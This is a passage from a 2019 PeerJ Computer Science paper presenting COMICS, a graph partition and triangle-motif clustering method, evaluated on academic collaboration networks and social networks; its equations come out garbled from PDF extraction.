set of motifs and their corresponding frequencies. Besides, the network motifs can be detected by comparing the frequencies of subgraphs in the original network with a statistical model. The authors in Wegner (2014) notice that real networks contain significant densities of different motifs. It illustrates networks in different fields hold different collaboration patterns, and motifs are the fingerprints of different networks. By observing the characteristics from real networks, Benson, Gleich & Leskovec (2016) develop a generalized framework to cluster networks on basis of higher-order connected patterns. A framework is proposed to model the relations between higher-order motif instances and graph nodes with a bipartite graph (Li et al., 2017a). In Monti, Otness & Bronstein (2018), MotifNet is introduced to deal with directed graphs by exploiting local graph motifs. In order to tackle the graph analysis problem, we combine the graph partition method with the motif-based clustering procedure to speed up the clustering process. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 4/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ System model and problem formulation In this section, we present basic theoretical definitions about cutting conditions and the mathematical expressions of motifs. After that, we describe the investigated problems in details. Comparative conditions for cluster In this subsection, we introduce four conditions to partition the original large collaboration networks into different clusters. For a given graph G = (V, E), we define the adjacent matrix H = {hi,j} as: if there exists an edge between vertices i and j, hi,j = 1; otherwise, hi,j = 0. Network partition is defined as: P ¼ fG1; G2; . . . ; Gkg; 1 � k � jVj, subject to: (1) SK k¼1 Gk ¼ V, (2) Gk \ Gt ¼ [, ∀k s t, and (3) Gk 6¼ [; 8k. For ∀k, the partition P satisfies the x—valid condition, called x—valid cluster partition of G, and x is defined as the following conditions according to Lu et al. (2013): Condition 1 : X 8j2Gk Hi;j > X 8j2VnGk Hi;j; 8i 2 Gk; 8k: (1) Condition 2 : X 8j2Gk Hi;j > X 8j2Gt Hi;j; 8i 2 Gk; k 6¼ t: (2) Condition 3 : X 8j2Gk Hi;j > X 8i2Gk;8j2VnGk Hi;j; 8k: (3) Condition 4 : X 8j2Gk Hi;j > X 8i2Gk;8j2Gt Hi;j; 8k 6¼ t: (4) Conditions 1 and 2 check the validity of clusters at the vertex level to confirm whether the internal degree of each vertex is larger than that of the external degree. Conditions 3 and 4 check the validity of clusters, that is, comparing the total internal degree of each cluster. When large graphs are partitioned under the above-mentioned four conditions, Condition 1 generally results in fewer, but larger subgraphs; Condition 4 will lead to more and smaller communities; Conditions 2 and 3 will cause more and smaller communities than Condition 1, but fewer and larger communities than Condition 4. Definitions of network triangle motifs In real networks, the most common high-order structures are small network subgraphs, which are defined as motifs, that is, a set of edges with a small number of nodes. In this paper, we analyze undirected triangular motif-based networks. Formally, we define a triangle motif by a tuple (B, A), where B is a 3 � 3 binary matrix and A � f1; 2; � � � ; ng is the set of anchor nodes. The matrix B encodes the edge pattern between the three nodes in triangle motifs, and A represents a relevant subset of nodes to define motif conductance. Then, let wA be a selection function, taking the subset of a 3-tuple induced by A. Define set (·) as the operator, which takes a tuple to a set, set (v1, v2, v3) = {v1, v2, v3}. Then, the motif set of an unweighted and undirected graph with adjacency matrix A can be denoted by Eq. (5), where v1 s v2 s v3, Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 5/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ Tri ðB; AÞ ¼ fset ðvÞ; set ðvAðvÞÞjv 2 Vk; Av ¼ Bg: (5) Here, Av is the k � k adjacency matrix of the subgraph with k nodes of the order vector v. In this paper, the motifs are undirected and unweighted. The matrix B of motif is symmetrical. Hence, we use (v, wA(v)) to denote (set (v), set (wA(v))) for convenience. Furthermore, we regard any (v, wA(v)) ∈ Tri (B, A) as a motif instance. If A and B are arbitrary or clear from context, we simply denote the motif set by Tri. We define the motifs, that is, wA(v) = v, as simple motifs, and others are anchor motifs. We give an example of triangle motif definition, as shown in Fig. 1, aiming to cluster the given five-node network by the two triangle motifs. First, we define the motifs by the description in Eq. (5). For motif Tri1, there are two instances of the motifs in G. Meanwhile, for motif Tri2, G has three instances, and the anchor sets of each instance is the node whose degree is one. The definition of the triangle motif conductance replaces an edge with a motif instance of type Tri. We suppose that a given network has been clustered into two subnetworks, that is, g and �g, and the conductance based on motifs can be expressed in Eq. (6), c ðGÞ Tri ðSÞ ¼ ðcutðGÞTri ðg; �gÞÞ minðvolðGÞTri ðgÞ; vol ðGÞ Tri ð�gÞÞ : (6) When there is at least one anchor node in S and at least one anchor node exists in �g, a motif instance can be cut. In Eq. (6), cut ðGÞ Tri ðg; �gÞ is the number of instance cut. vol ðGÞ Tri ðgÞ is the number of instances, whose end nodes are in g. To be more specific, following the definition of Tri in Eq. (5), as for the same wA(v), there may exist many different values of v, and nodes in wA(v) are still counted proportionally into the number of motif instances. This growth tendency of motifs is consistent with the number of nodes in networks. This can prove the availability of motifs in clustering networks. Definition of motif-base matrices Given a graph and a set of motif Tri, the motif adjacency matrix WTri of graph is shown as: ðWTriÞij ¼ X ððv;vAðvÞÞ2TriÞ 1 ðfi; jg � vAðvÞji 6¼ jÞ: (7) Herein, (WTri)ij is the number of motif instances in M, where nodes i and j are both in a triangle motif. In other words, the weight will be added into (WTri)ij if and only if node i Figure 1 Example of motif definition in diagram: the motifs Tri1 and Tri2 are leveraged to detect in the five-node graph G on the left figure. The motifs are defined by a binary matrix B and an anchor set of nodes. B1 and B2 are the binary matrices of Tri1 and Tri2, respectively. Similarly, A1 and A2 are the anchor node sets of Tri1 and Tri2, respectively. Full-size DOI: 10.7717/peerj-cs.180/fig-1 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 6/22 http://dx.doi.org/10.7717/peerj-cs.180/fig-1 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ and node j both appear in the anchor set. In the collaboration networks, (WTri)ij depends on the number of scholars, who collaborate with both scholar i and scholar j. Then, the motif diagonal degree matrix DM is defined as ðDTriÞii ¼ Pn j¼1 ðWTriÞij. The motif Laplacian can be calculated by LTri = DTri - WTri. Finally, we normalize the motif Laplacian as: �Tri ¼ I � D�1=2Tri WTriD �1=2 Tri : (8) Problem statement Let G = (V, E) be a connected large network, where V is the node set, and E is the edge set. If G contains several disjoint networks, it can be expressed as G = {G1, G2, ⋯, Gn}. The complete triangle is the target motif to analyze the large-scale networks. Our objective is to find the dense and stable disjoined subgraph set P ¼ fG001; G002; . .. ; G00mg of the given network by motifs. Given a node v ∈ V in the network Gi ∈ G, the degree of v is denoted by deg(v) and the neighbor node set of the subgraph Gi in the original networks is denoted by NGi. In the partition phase, Gi can be cutted into a set of subgraphs, G 0 i1; G 0 i2; . . . ; G 0 ikf g. For a node v in a partition subgraph G0ij of Gi, we use deginter(v) and degextra(v) to represent the degree within G0ij and the number of edges between G 0 ij and Gi=G 0 ij, respectively. Con(G 0 ij) is the set of subgraphs that are connected with G0ij in the partition P. Variable Q is the modularity score when the original graph G gets the partition P. In the process of graph partition, we cut the original networks into initial subgraphs under the four conditions. In that way, the network can be cutted into subgraphs with strong internal connectivity and weak external connectivity in both local and global aspects. The modularity score refining subprocedure can optimize the partition. Then, we cluster and analyze the initial dense subgraphs by the complete triangle motif. COMICS algorithm In this section, we describe the whole process of our COMICS in details. As shown in Fig. 2, COMICS consists of a series of partition refine strategies and a motif-based clustering procedure, that is, graph partition, modularity refine procedure and motif-based Figure 2 Architecture of COMICS. Full-size DOI: 10.7717/peerj-cs.180/fig-2 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 7/22 http://dx.doi.org/10.7717/peerj-cs.180/fig-2 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ clustering procedure. We first illustrate the graph partition techniques under four conditions and the modularity refine procedure in Algorithm 1. After that, the motif-based clustering procedure is constructed on each subgraph in cutting set. We specify the whole clustering layer algorithm in Algorithm 4, by which we are able to get the close and stable subgraph structures from the original input networks. Graph partition and modularity refine procedures To obtain the total information of large networks effectively, we first perform cutting operations in large networks. In this subsection, we explain the graph partition and modularity refine procedures in details. We use the total large graph as the input of the partition procedure, and the procedure returns a set of partition subgraphs of the original graph. The subgraph set is refined in the modularity refine procedure by modularity score. In the graph partition procedure, we take the differences between the internal and external degrees as the degree difference value of a node v, denoted by D(v), that is, DðvÞ ¼ deginterðvÞ � degextraðvÞ: (9) For all pairs of nodes v and u in networks, if nodes v and u fall in the same subgraph, the quantity of svsu is 1, otherwise, it equals to -1. |E| is the total number of edges in the original network. The value of ev, u is 1, if there exists one edge between nodes v and u, otherwise it is 0. Therefore, the modularity score of a network is defined as Eq. (10): Q ¼ 1 4jEj X v;u � ev;u � deg vð Þdeg uð Þ 2jEj � ðsvsu þ 1Þ: (10) Algorithm 1 Graph Partition Algorithm Input: Large graph G, conditions Output: R: A partition set P of G 1: Add G to R 2: while |R| increases and Rj j 6¼ 1 do 3: for each subgraph Gi in R do 4: \\ rootG0ij is a node from Gi. A new subgraph G 0 ij can be generated from Gi with rootG0ij . 5: rootG0ij ¼ argmin v 2 V deg vð Þf g 6: for node v in NðG0ijÞ do 7: if v satisfies the given conditions then 8: Add node to G0ij 9: else 10: rootG0ij ¼ argmin v 2 V D vð Þf g 11: end if 12: end for 13: Make the partition G0ij=Gi; Gi � � 14: end for 15: end while 16: return R Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 8/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ As described in Algorithm 1, we take the large networks and the cutting conditions as the input of the graph partition procedure. At the beginning of this procedure, there is only one original graph added in the result partition set R. The number of subgraphs in R is represented as |R|. In each outer loop, each subgraph Gi is chosen to generate new subgraphs, G0ij. Hence, the root node of the new subgraph G 0 ij is selected randomly among the nodes that are with the minimum degree of the new subgraph in R. As described in lines 6–12, the loop aims to generate the new graph from the root node from Gi. If at least one neighbor node of the total new subgraph satisfies the validity of the input conditions, the neighbor node is added to the new subgraph G0ij with its connectivity; otherwise, it means that there is no neighbor with this root node, and we select a new node in Gi as the root to check the connectivity with the original network. The node with the minimum difference between the internal and external degrees will be the root node of G0ij. Then, graph partition operations will be carried until no other nodes from the original networks satisfy the cutting condition. In line 3 of Algorithm 1, there are two cases when selecting a new root node of the new subgraph: one is that the root node selected in line 4 or line 9 has no neighbor, that is, the degree of root node is 0. It indicates the root node vroot is invalid, and no new subgraph can be added into R. The other situation is that there is no node in G connected with the partition subgraph. In other words, the iteration of adding nodes to the new subgraph stops. Then a new subgraph generated by the root node vroot is added to the subgraph set R. The iteration of the partition procedure stops when the number of subgraphs in R does not increase any more. However, if there exists one graph in R all the time, it illustrates that the root node with the minimum degree is invalid, and we have to choose another root node and restart the iteration. Algorithm 1 cuts large graph into small dense subgraphs. Each loop generates a new subgraph from set R, and the loop stops when no more dense subgraph can be found. To avoid damaging the connectivity of the rest nodes, we check the connectivity of both cutting and remaining parts, if there exists more than one component, we put all subgraphs in set R to the modularity refine procedure in Algorithm 2. The modularity refine procedure described in Algorithm 2 takes the results of the Algorithm 1 as input to refine the partition results of the original networks. As shown in Algorithm 2, lines 1 and 2 enumerate two connected subgraphs: G0ij and G 0 ik in R. In the following line 3 to line 6, if the two subgraphs are combined to one, it results in much higher modularity score than the original network partition. Then we replace G0ij and G 0 ik by G 0 ij [ G0ik, and the iteration stops until the modularity scores do not increase any more. Variable R0 is the result set of Algorithm 2, containing a series of refined subgraphs. This procedure of graph partition aims to maintain more structure information of the original large-scare networks, so that the output partition by Algorithm 2 can achieve higher modularity score than the input subgraph set. The operation of merging these two cutting subgraphs increases the internal degrees. Merging two subgraphs into one can also decrease the external degree for the subgraphs in partition P. If two subgraphs can be merged, the number of edges between them is larger than that cannot be Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 9/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ merged. Then as long as the two subgraphs are merged, the external degree of the input network can be reduced. Triangle motif-based clustering procedure We take the subgraph set of the original network as the input of the motif-based clustering procedure. As shown in Algorithm 3, its main idea is to find a single cluster in a graph by leveraging target motifs. In this procedure, we cluster the subgraphs in R by the minimum conductance, aiming to find the most stable part with the highest conductance of the given subgraph. The algorithm outputs a partition of nodes in g and �g. The motif conductance is symmetric in the sense that c ðGÞ Tri ðGNodeÞ ¼ c ðGÞ Tri ð�GNodeÞ, so that any set of nodes (g and �g) can be interpreted as a cluster. However, it is common that one set is substantially smaller than the other in practice. We take the larger set as a module in the network. Some networks are clustered for specific motivations, such as mining the relationships of a person in the social networks. In that case, Algorithm 3 takes the larger part in the clustering results g and �g as the cluster results as shown from line 9 to line 12. In the process of the motif-based clustering, we take the target motif and a subgraph partitioned in R (the output of Algorithm 2) as the input. As shown in Fig. 3, for a given graph and a target motif, we calculate a series of matrices, that is, WTri, DTri, and �Tri, before weighting the input graph of matrix WTri. Therefore, the graph is cut by the minimum conductance c ðGÞ Tri expressed in Eq. (6). In line 8 of Algorithm 3, the value of c ðGÞ Tri is determined by a series of sorted eigenvalues of the subgraph’s motif Laplacian matrix �Tri. Between the two cut subgraphs of the input graph, the larger one will be chosen as the output result. Combined COMICS algorithm In this subsection, we describe the overall algorithm of COMICS in Algorithm 4. It combines all three subprocedures in this subsection. Algorithm 2 Modularity Refine Algorithm Input: Subgraphs set R, empty set R0 Output: Refined subgraphs set R0 1: for G0ij in R do 2: for G0ik in Con Gijð Þ do 3: if Q G0ij [ G0ik � � > Q G0ij � � then 4: G00ij ¼ G0ij [ G0ik 5: Remove Gij and G0ik from R 6: Add G00ij to R0 7: end if 8: end for 9: end for 10: return R0 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 10/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ We take the large-scale networks, target motifs and the given validity conditions as the algorithm input, and obtain the clustering set of the original input network. At beginning, a series of partition and refining operations are carried on input networks under the valid conditions. Then we get a partition with high modularity scores of the original input large networks. Each subgraph in the partition set has a strong internal connectivity and a weak external connectivity, maintaining the stable structure information of the original network. Furthermore, we carry the motif-based clustering operations on the subgraph in the partition set. Finally, we can get the non-overlapping optimal partition of the original graph. Time complexity analysis In this section, we analyze the time complexity of COMICS. The main clustering layer includes the following three phases: graph partition, graph refining and motif-clustering. Algorithm 3 Triangle Motif-based Clustering Algorithm Input: Graph G and motif Tri Output: Subgraph set of the original network 1: (WTri)ij = number of triangle motif instances of Tri 2: GTri ) weighted graph induced WTri 3: DTri = diagonal matrix with ðDTriÞii ¼ Pn j¼1 ðWTriÞij 4: �Tri ¼ I � D�1=2Tri WTriD �1=2 Tri 5: z = eigenvector of second smallest eigenvalue for �Tri 6: ri = to be the index of D ðð�1Þ=2Þ Tri 7: z = ith smallest value 8: g ¼ argminl cðGÞTri ðGlNodeÞ; where l ¼ s1; � � � ; sk 9: if gj j > �gj j then 10: return g 11: else 12: return �g 13: end if Figure 3 Triangle motif-based clustering of COMICS. Full-size DOI: 10.7717/peerj-cs.180/fig-3 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 11/22 http://dx.doi.org/10.7717/peerj-cs.180/fig-3 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ We assume m and n as the number of edges and nodes in the network. Here, d(v) is the degree of node v and dmax is the maximal degree in the network. Graph partition procedure: To get and parse the information from large networks effectively, we first apply cutting operations on the large-scale networks. We analyze the worst case of the graph partition subprocedure. In the first cutting iteration, the root node is one of the nodes with the smallest degree in the graph, and its time complexity is O(n). For each new subgraph g generated by root node v, we check the connectivity of the new-added nodes, including the internal and external links with subgraph g and check the corresponding conditions before partitioning. The time complexity of this procedure is Oðn2d2maxÞ. Modularity refining procedure: In the subgraph refining procedure, we use modularity score Q (Newman, 2006) to get a suitable partition. The required time of iterations is up to the number of subgraphs in the result sets R, which are generated by the graph partition procedure. We define the number of subgraphs in R as p, and the runtime of the procedure is determined by the step of calculating Q, whose computation complexity is O[(m + n)n]. Because the first refining subgraph need to check the other p - 1 subgraphs and the second one checks the remaining p - 2. Hence, the total checking times is p2/2. Therefore, the computation complexity of the refining procedure is O[p2(m + n)n/2]. Triangle motif-based clustering procedure: In general, the time complexity of the algorithm is determined by the construction of the adjacency matrix and the solution of the eigenvector. For simplicity, we consider that we can access network edges within O(1), and modify matrix entries within O(1). The complexity of calculating the eigenvectors through Laplacian matrix is O((m + n) (log n)O(1)), and sorting the eigenvector indexes can be finished in time O(n log n). For a motif with three nodes, we can compute WM in �(n 3) in a complete graph with n nodes. Therefore, the computation complexity of the motif-based analysis procedure is O(n3). According to the description above, the time complexity of COMICS is O(rn3), where r is the number of subgraphs in the partition set R, and n is the number of nodes. EXPERIMENTS In this section, we compare COMICS with K-means and co-authorship team detection algorithm from the perspectives of network clustering accuracy and time complexity, Algorithm 4 Combined COMICS Algorithm Input: Large graph G, conditions and motif Tri Output: Motif-based cluster set (subset of nodes in G) 1: Set R1 as an empty set 2: R = Graph Partition Algorithm(G, conditions) 3: R0 = Modularity Refine Algorithm(R) 4: for g in R0 do 5: g0 = Triangle Motif-based Clustering Algorithm(g, Tri) 6: Add g0 to R1 7: end for 8: return R1 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 12/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ respectively. We choose four large-scale networks, including two social network, that is, Facebook and gemsec-Deezer data sets (Leskovec & Krevl, 2014; Rozemberczki et al., 2018) and two academic collaboration networks, that is, APS and MAG data sets. We analyze the accuracy of the clustering results by calculating compactness and separation. We demonstrate the efficiency of our solution in both academic collaboration and social networks. We also consider other statistical data information of academic networks, TCVs, TPVs, and MSV. All those corresponding metrics are illustrated in this section. All experiments are conducted on a desktop with Intel(R) Xeon(R) CPU E5-2690 v3 @ 2.60 GHz (two processors) and 128 GB memory. The operating system is Window 10, and the codes are written in python. The American Physical Society data set (2009–2013) consists of 96,908 papers associated with 159,724 scholars in the physical field. Meanwhile, the MAG data set (1980–2015) on computer science includes 207,432 scholars with 84,147 papers in the computer science area. Edges in the academic networks represent two authors have coauthored at least one paper. The Facebook social network data set in our experiments contains eight networks, 134,833 nodes and 1,380,293 edges. We list the eight social networks in Table 1. In that case, we cluster the social networks by the different categories listed in the data set. Gemsec-Deezer data set collected by Deezer (November 2017) is also experimentalized in this paper. This data set contains 143,884 nodes and 846,915 edges from three countries, Romania (41,773 nodes and 125,826 edges), Croatia (54,573 nodes and 498,202 edges) and Hungray (47,538 nodes and 222,887 edges). Experiment settings In this subsection, we describe the settings of our experiments from three aspects, that is, time cost, clustering accuracy and academic teamwork behavior analysis with complete triangle motif in academic areas. In academic collaboration networks, we consider two algorithms. The Facebook social networks do not contain any statistical information. Therefore, we merely compare our method with K-means algorithm in the social network: K-means clustering algorithm (Ding & He, 2004): This method proves that principal components are the continuous solutions to cluster membership indicators for K-means clustering. It takes principal component analysis into the clustering process, which is suitable for the scholar science and social data sets. Co-authorship algorithm (Reyes-Gonzalez, Gonzalez-Brambila & Veloso, 2016): This algorithm considers all the principal investigators and collaborators, and defines Table 1 Facebook date sets. TV shows Politician Government Public figures Node 3,892 5,908 7,057 11,565 Edge 17,262 41,729 89,455 67,114 Athletes Company New Sites Artist Node 13,866 14,113 27,917 50,515 Edge 86,858 52,310 206,259 819,306 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 13/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ knowledge footprints1 of the groups to calculate the distances between scholars and the group. Based on the distance, the academic groups can be detected in an accurate way. This method iterates all the researchers with their collaborator and institution similarities until they are assigned to a academic team can be applied to understand the self-organizing of research teams and obtain the better assessment of their performances. To demonstrate the runtime efficiency and the accuracy of our clustering results in large-scale networks, we divide the APS and MAG data sets into different parts with various sizes by years, respectively, so that we can get the collaboration networks with distinct number of nodes (from 1,000 to 200,000). Considering the integrality and veracity of the academic research teams in data sets, we take the whole APS and MAG data sets as the collaboration networks to detect the collaborative relationships. Evaluation metrics To evaluate and analyze the accuracy of network clustering results of our proposed COMICS, we use two metrics, that is, compactness and separation, to evaluate node closeness in clustering results and the distances among clusters. In academic collaboration networks, we combine the statistical paper publishing data with network structures together, and calculate three metrics to find the characteristics discovered through the target triangle motif to uncover the hidden collaboration patterns and teamwork of scholars in academic networks. Compactness and separation (Halkidi, Batistakis & Vazirgiannis, 2002) are used to evaluate the accuracy of clustering results by different methods. Compactness is a widely used metric to quantify the tightness of clustering subgraphs, representing the distances between nodes in a subgraph. Separation calculates the distances among the cores of different subgraphs. That is, if a clustering subgraph is with lower compactness value and higher separation value, the subgraph can be detected effectively. Compactness is expressed by Eq. (11), Compactness ¼ 1 Rj j X vi2� vi � wj j: (11) Here, R is the clustering result set, vi is one of the nodes in the subgraph, and w is defined as the core of the subgraph cluster, because w is the node with the maximum degree in a cluster. The value of |vi - w| means the shortest distance between node vi and the cluster core node w. SP is defined as in Eq. (12). Separation ¼ 2 k2 � k Xk i¼1 Xk j¼iþ1 jwi � wjj; (12) wherein, k is the number of subgraphs in the result set and wi is the core of the given subgraph i, which is the same as wj. The value of |wi - wj| equals to the shortest distance between wi and wj. 1 knowledge footprints of a group are the union of all the backward citations used by group members in all of their papers within a specific time period. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 14/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ In collaboration networks, we assume the clusters as academic teams, in which scholars work together. Therefore, three metrics are defined to analyze the collaboration behaviors through triangle motif: TCV, TPV, and MSV. TCV: This metric reflects the tightness and volatility among members in a team. For one scholar i in a team, we define the TCV as follows, sco ¼ Pn i ðcoi � coaveÞ2 n : (13) Herein, n is the number of team members, coi is the number of scholars that scholar i has collaborated within the same team, and coave is the average number of collaborators collaborated with scholars in a team. TPV: An academic team with high performance refers that the members in team have published a large number of paper. Similarly, in a stable team, the gaps of published paper numbers among team members are small. To evaluate the academic levels and stability of a team, we define TPV as follows: sqtt ¼ Pn i ðqi � qaveÞ2 n ; (14) where sqtt means scholar i’s variance of publishing papers in the detected team, qi is the number of papers that scholar i has published, and qave is the average number of papers in the team. MSV: This metric calculates the difference of motif number that the scholar nodes are included in the collaboration networks. We define the MSV as follows, sprimitive ¼ Pn i ðti � taveÞ2 n : (15) Herein, ti is the number of target motif that scholar i owns, and tave is the average motifs of a team. To uncover the collaboration patterns mined by triangle motifs among scholars in academic teams, we use the above three arguments to analyze relationships between productions and motifs of the clustered academic teams. RESULTS AND DISCUSSION In this section, we evaluate the experimental results by comparing with K-means and co-authorship algorithm in both runtime and the effectiveness. In the view of internal and external connections, we calculate compactness and separation values for each algorithm results. The time cost results of three networks are shown in Tables 2–4, respectively. “K” in the tables represents thousand, for example, “1K” means a network with one thousand nodes. N/A means that the clustering procedure takes more than 5 days. According to Tables 2–4, it can be concluded that, in small networks (less than 30,000 nodes), the three methods make little differences in running time. However, as the size of network increases, our clustering algorithm costs the least time. The time costs in Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 15/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ different data sets make little differences. However, the results show the same trend and the proposed method takes more time in small networks and outperforms other large networks. As shown in Tables 2 and 3, when academic collaboration networks contain more than 30,000 nodes, COMICS takes the least time than the other two algorithms. More than that, in social networks, the time cost of our method is also satisfied in large size networks. Therefore, it can be concluded that though the partition operations cost a Table 2 APS runtime. COMICS Co-authorship K-means 1 K 36.32 s 2.12 s 1.73 s 3 K 435.67 s 17.45 s 207.06 s 10 K 3,058.21 s 1,084.83 s 3.47 h 30 K 1.03 h 2,856.47 s 5.73 h 50 K 1.83 h 4.82 h 13.36 h 80 K 2.29 h 9.87 h >24 h 120 K 5.46 h 16.36 h >24 h 150 K 9.97 h >24 h N/A Table 3 MAG runtime. COMICS Co-authorship K-means 1 K 24.74 s 3.79 s 2.04 s 3 K 343.17 s 21.05 s 237.93 s 10 K 2,956.64 s 345.29 s 3.53 h 30 K 1.08 h 2,636.95 s 6.62 h 50 K 2.47 h 2.93 h 12.48 h 80 K 3.35 h 4.07 h >24 h 120 K 5.09 h 8.27 h >24 h 150 K 8.91 h 21.83 h N/A 200 K 14.68 h >24 h N/A Table 4 Social network runtime. COMICS K-means TV shows 573.62 s 322.86 s Politician 1,394.05 s 786.42 s Government 1.03 h 2.71 h Public figures 1.26 h 1.60 h Athletes 1.58 h 2.04 h Company 0.98 h 3.07 h New sites 4.78 h 9.32 h Artist 6.89 h 23.42 h Romania 3.46 h 17.68 h Hungray 3.96 h 18.07 h Croatia 6.04 h 38.42 h Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 16/22 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ lot of time, it is necessary to apply the speeding up techniques in clustering. Moreover, for different types of networks, topological structures, density are also vital factors that can effect the clustering procedures and results. Figures 4A and 5A show the compactness values generated by our algorithm and the comparing algorithms on different sizes of networks, respectively. As the figures show, in collaboration networks, compactness values corresponding to different networks are lower than those in co-authorship algorithm and K-means algorithm, which are similar with that in social networks. Our algorithm performs better than the two comparing algorithms. Figures 4B and 5B plot the separation values of the three algorithms with the network growth in both academic, Facebook social and gemsec-Deezer networks. It can be seen that with the growing network size, COMICS achieves the highest separation values. This means subgraphs clustered by our method have greater separation values all the time. According to Figs. 4B and 5B, we can conclude that the distances among core nodes in each cluster are close no matter what algorithms are used. The reason is that no matter what algorithms are used in the target network, the core nodes of clusters are almost the same. All the core nodes are with the maximum degrees. In all, our clustering algorithm achieves the best subgraph clustering results obviously. Analysis in academic collaboration networks After analyzing the time complexity and effectiveness of our system above, in this subsection, we analyze the clustering results with the triangle motifs in academic collaboration networks. The results prove the triangle motif structures can reflect the hidden statistical information and connections with network structures. For example, as the analysis results show, collaboration patterns as well as the correlations of network structure and team productions can be summarized in the academic collaboration networks. We regard the cluster results of each academic collaboration network as an academic team. Then the values of three variances, that is, TPV, TCV, and MSV are calculated, and the results are shown in Figs. 6A and 6B. Hence, we can see that the number of high-order triangle motif can reflect the performance of an academic team to some extent. Figure 4 The variation tendency of compactness and separation values of collaboration network clustering results with COMICS, co-authorship and K-means algorithms. (A) Compactness in aca- demic collaboration networks and (B) separation in academic collaboration networks. Full-size DOI: 10.7717/peerj-cs.180/fig-4 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 17/22 http://dx.doi.org/10.7717/peerj-cs.180/fig-4 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ According to Figs. 6A and 6B, we conclude that the TPV and TCV are both proportional to the MSV. Meanwhile, the TPV is also approximately positive linear with the MSV. That means, the lower the MSV is in a cluster team, the performance of team members are in smaller gaps. Therefore, it can be concluded that the value of MSV can reflect the gap of collaboration relationships in teams and performance of team members. However, we can infer that the scholars with few number of complete triangle motifs, have collaborated with only few scholars in the team. Those scholars are probably students or new team members, resulting in the high collaboration and paper variances. Hence, in collaboration networks, we can use MSV to evaluate the gaps of team collaboration relationships and the performance of team members. The two teamwork gaps in different periods represent the stability and volatility of academic teams. CONCLUSION In this paper, we put forth the high-order motif-based clustering system to get a subgraph set from the large-scale networks. In the constructed system, we take graph partition and refining techniques to speed up algorithm runtime. Through network cutting, we check the Figure 5 The variation tendency of compactness and separation values of the clustering results in social networks with COMICS and K-means algorithms. (A) Compactness in social networks and (B) separation in social networks. Full-size DOI: 10.7717/peerj-cs.180/fig-5 Figure 6 Positive relations in collaboration networks through collaboration variances, paper variances and motif variances of each clustering. Red rectangles and blue triangles represent the col- laboration academic teams clustered from MAG and APS data sets, respectively. (A) Relationships between TCV and MSV and (B) relationships between TPV and MSV. Full-size DOI: 10.7717/peerj-cs.180/fig-6 Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 18/22 http://dx.doi.org/10.7717/peerj-cs.180/fig-5 http://dx.doi.org/10.7717/peerj-cs.180/fig-6 http://dx.doi.org/10.7717/peerj-cs.180 https://peerj.com/computer-science/ four cutting conditions from the aspect of network connectivity, which can prevent damaging the global structures of large-scale networks. Experiments are carried on four large networks, that is, APS and MAG from the academic area, Facebook and gecsec-Deezer networks from the social area, respectively. The results demonstrate the effectiveness of our method in time cost and accuracy in large-scale network clustering. Furthermore, the collaboration teamwork analysis verifies the availability of complete triangle motif, which represents the smallest collaboration unit in the collaboration networks. We analyze the collaboration clustering results with three metrics, that is, TCV, TPV, and MSV. The results show that both TCV and TPV are proportional to MSV. Therefore, it can be concluded that the value of MSV can reflect the two gaps, that is, collaborative relationships and performance of different team members. Besides, the two gaps in different periods can also reflect the dynamic change of team members. In the future, we will focus on dynamic motif clustering for real-time network management (Ning et al., 2018; Ning, Huang & Wang, 2019; Wang et al., 2018a). In addition, network security (Wang et al., 2018b, 2019) and crowdsourcing based methods (Ning et al., 2019a, 2019b) also deserve to be investigated. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by China Postdoctoral Science Foundation under Grant 2018T110210 and State Key Laboratory for Novel Software Technology, Nanjing University, under Grant KFKT2018B04. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: China Postdoctoral Science Foundation: 2018T110210. State Key Laboratory for Novel Software Technology, Nanjing University: KFKT2018B04. Competing Interests The authors declare that they have no competing interests. Author Contributions � Yufan Feng conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. � Shuo Yu conceived and designed the experiments. � Kaiyuan Zhang analyzed the data, contributed reagents/materials/analysis tools, performed the computation work. � Xiangli Li performed the experiments, analyzed the data, performed the computation work. � Zhaolong Ning conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Feng et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.180 19/22 http://dx.doi.org/10.7717/peerj-cs.180 